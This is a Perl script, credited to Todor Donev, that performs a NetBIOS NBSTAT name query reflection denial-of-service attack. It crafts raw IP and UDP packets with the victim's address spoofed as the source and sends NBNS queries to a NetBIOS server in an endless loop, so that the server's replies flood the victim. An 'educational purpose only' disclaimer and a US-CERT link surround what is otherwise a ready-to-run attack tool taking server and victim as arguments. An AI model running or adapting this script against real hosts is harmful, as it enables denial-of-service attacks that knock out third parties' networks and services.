#!/usr/bin/perl # # NetBios NBSTAT name query reflection dos # # Copyright 2015 (c) Todor Donev # todor.donev@gmail.com # http://www.ethical-hacker.org/ # https://www.facebook.com/ethicalhackerorg # # Disclaimer: # This or previous program is for Educational # purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the # fact that Todor Donev is not liable for any # damages caused by direct or indirect use of the # information or functionality provided by these # programs. The author or any Internet provider # bears NO responsibility for content or misuse # of these programs or any derivatives thereof. # By using these programs you accept the fact # that any damage (dataloss, system crash, # system compromise, etc.) caused by the use # of these programs is not Todor Donev's # responsibility. # # Use at your own risk and educational # purpose ONLY! # # See also, UDP-based Amplification Attacks: # https://www.us-cert.gov/ncas/alerts/TA14-017A # http://www.rhyshaden.com/netbios.htm # use strict; use Socket; use warnings; no warnings 'uninitialized'; if ( $< != 0 ) { print "Sorry, must be run as root!\n"; print "This script use RAW Socket.\n"; exit; } my $nbns = (gethostbyname($ARGV[0]))[4]; # IP Address Destination (32 bits) my $victim = (gethostbyname($ARGV[1]))[4]; # IP Address Source (32 bits) print "[ NetBios NBSTAT name query reflection ddos\n"; if (!defined $nbns || !defined $victim) { print "[ Usg: $0 <nbns src> <victim>\n"; print "[ <todor.donev\@gmail.com> Todor Donev\n"; exit; } print "[ Sending NBNS packets: $ARGV[0] -> $ARGV[1]\n"; socket(RAW, PF_INET, SOCK_RAW, 255) or die $!; setsockopt(RAW, 0, 1, 1) or die $!; main(); # Main program sub main { my $packet; $packet = iphdr(); $packet .= udphdr(); $packet .= nbnshdr(); # b000000m... send_packet($packet); } # IP header (Layer 3) sub iphdr { my $ip_ver = 4; # IP Version 4 (4 bits) my $iphdr_len = 5; # IP Header Length (4 bits) my $ip_tos = 0; # Differentiated Services (8 bits) my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits) my $ip_frag_id = 0; # Identification Field (16 bits) my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits) my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits) my $ip_ttl = 255; # IP TTL (8 bits) my $ip_proto = 17; # IP Protocol (8 bits) my $ip_checksum = 0; # IP Checksum (16 bits) # IP Packet my $iphdr = pack( 'H2 H2 n n B16 h2 c n a4 a4', $ip_ver . $iphdr_len, $ip_tos, $ip_total_len, $ip_frag_id, $ip_frag_flag . $ip_frag_offset, $ip_ttl, $ip_proto, $ip_checksum, $victim, $nbns ); return $iphdr; } # UDP Header (Layer 4) sub udphdr { my $udp_src_port = 31337; # UDP Sort Port (16 bits) (0-65535) my $udp_dst_port = 137; # UDP Dest Port (16 btis) (0-65535) my $udp_len = 8 + length(nbnshdr()); # UDP Length (16 bits) (0-65535) my $udp_checksum = 0; # UDP Checksum (16 bits) (XOR of header) # UDP Packet my $udphdr = pack( 'n n n n', $udp_src_port, $udp_dst_port, $udp_len, $udp_checksum ); return $udphdr; } # NetBios Name Service sub nbnshdr { my $transid = 0x03e8; my $namequery = 0x0010; my $questions = 0x0001; my $answerrr = 0x0000; my $authrr = 0x0000; my $adrr = 0x0000; my $query = "\x20\x43\x4b\x41\x41\x41\x41\x41\x41\x41\x41"; $query .= "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"; $query .= "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00"; my $type = 0x0021; my $class = 0x0001; # NetBios packet my $nbnshdr = pack( 'n n n n n n a* n n', $transid, $namequery, $questions, $answerrr, $authrr, $adrr, $query, $type, $class ); return $nbnshdr; } sub send_packet { while(1){ select(undef, undef, undef, 0.30); # Sleep 300 milliseconds send(RAW, $_[0], 0, pack('Sna4x8', AF_INET, 60, $nbns)) or die $!; } }